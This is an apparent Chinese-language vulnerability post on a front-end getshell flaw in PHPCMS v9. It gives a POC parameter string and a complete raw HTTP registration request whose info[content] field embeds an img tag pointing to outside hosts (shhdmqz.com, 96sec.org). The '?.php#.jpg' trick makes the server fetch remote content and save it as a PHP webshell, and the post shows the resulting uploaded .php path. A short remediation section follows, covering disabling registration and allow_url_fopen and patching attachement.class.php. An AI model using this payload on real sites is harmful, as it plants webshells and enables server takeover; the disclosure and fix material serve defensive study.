phpcmsv9前台getshell

POC:

siteid=1&modelid=11&username=newbie&password=newbie&email=newbie@qq.com&info[content]=<img src=http://shhdmqz.com/newbie.txt?.php#.jpg>&dosubmit=1&protocol=


POST

POST /index.php?m=member&c=index&a=register&siteid=1 HTTP/1.1
Host: 127.0.0.1
Content-Length: 297
Cache-Control: max-age=0
Origin: http://192.168.87.128
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Referer: http://127.0.0.1/index.php?m=member&c=index&a=register&siteid=1
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,es;q=0.6,fr;q=0.4,vi;q=0.2
Cookie: PHPSESSID=h5jo0216vveqr9blnh146tq5q5
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Originating-IP: 127.0.0.1
Connection: close

siteid=1&modelid=2&username=520520&password=5205201&pwdconfirm=5205201&email=52052096%40163.com&nickname=52096&dosubmit=%E5%90%8C%E6%84%8F%E6%B3%A8%E5%86%8C%E5%8D%8F%E8%AE%AE%EF%BC%8C%E6%8F%90%E4%BA%A4%E6%B3%A8%E5%86%8C&protocol=&info[content]=<img src=http://www.96sec.org/md5.txt?.php#.jpg>

{055DCA59-5A0A-4BA3-BDFB-7DB73A942B50}.jpg


复制图片地址:http://127.0.0.1/uploadfile/2017/0411/20170411015048242.php


漏洞修复方案


暂时性修复:


关闭注册页面

关闭远程文件包含,即关闭allow_url_fopen

彻底性修复:

修改  phpcms/libs/classes/attachement.class.php文件中的download函数在

foreach($remotefileurls as $k=>$file)循环中,大约是167行左右的位置,将

if(strpos($file, '://') === false || strpos($file, $upload_url) !== false) continue;            $filename = fileext($file);

修改为

$filename = fileext($k);


评论回复